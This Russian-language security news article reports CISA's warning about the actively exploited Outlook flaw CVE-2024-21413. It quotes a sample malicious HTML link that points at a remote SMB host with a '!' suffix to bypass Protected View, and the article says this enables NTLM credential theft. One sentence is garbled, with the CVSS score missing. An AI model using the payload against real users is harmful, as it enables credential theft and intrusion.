Восклицательный знак в Outlook стал инструментом взлома госучреждений

Восклицательный знак в Outlook стал инструментом взлома госучреждений

Microsoft признала критическую уязвимость в системе защиты.

image

Агентство CISA предупреждает о необходимости срочно закрыть критическую уязвимость в Microsoft Outlook, которая уже используется злоумышленниками. Предупреждение особенно касается федеральных агентств. Уязвимость CVE-2024-21413 позволяет выполнять произвольный код на удалённых системах, обходя защитные механизмы Outlook.

Ошибка была обнаружена Check Point и связана с некорректной проверкой ввода при открытии писем с вредоносными ссылками в уязвимых версиях Outlook. Эксплуатация ошибки даёт злоумышленникам возможность обходить режим защищённого просмотра, предназначенный для блокировки опасного контента. В результате вредоносные файлы Office открываются в режиме редактирования, что позволяет загружать и выполнять вредоносный код.

Microsoft исправила CVE-2024-21413 (оценка CVSS: в 2024 году, но предупредила, что уязвимость остаётся активной даже в режиме предварительного просмотра документов. В отчёте Check Point говорится, что злоумышленники используют обходной метод, добавляя в ссылки с протоколом file:// символ восклицательного знака и случайный текст после расширения файла. Такой подход позволяет обойти защитные механизмы Outlook и загрузить вредоносное содержимое. Пример:

<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>

Под угрозой находятся различные версии продуктов Microsoft:

  • Microsoft Office LTSC 2021;
  • Microsoft 365 Apps for Enterprise;
  • Microsoft Outlook 2016;
  • Microsoft Office 2019.

Успешная эксплуатация уязвимости может привести к краже NTLM-учётных данных и выполнению произвольного кода.

Федеральным агентствам необходимо устранить ошибку до 27 февраля в соответствии с директивой BOD 22-01. В CISA подчёркивают, что подобные уязвимости часто становятся целями хакеров и представляют серьёзную угрозу для государственной инфраструктуры. Хотя предписание касается госучреждений, специалисты настоятельно рекомендуют всем организациям срочно установить обновления безопасности, чтобы предотвратить возможные атаки.

Умеешь в ИБ?

Делись! Ближайший CIRF* уже 20 мая. Мероприятие бесплатное, но надо зарегистрироваться*

Реклама. 18+. ООО «МКО Системы», ИНН 7709458650
*Corporate incident response and forensics - корпоративное реагирование на инциденты и форензика.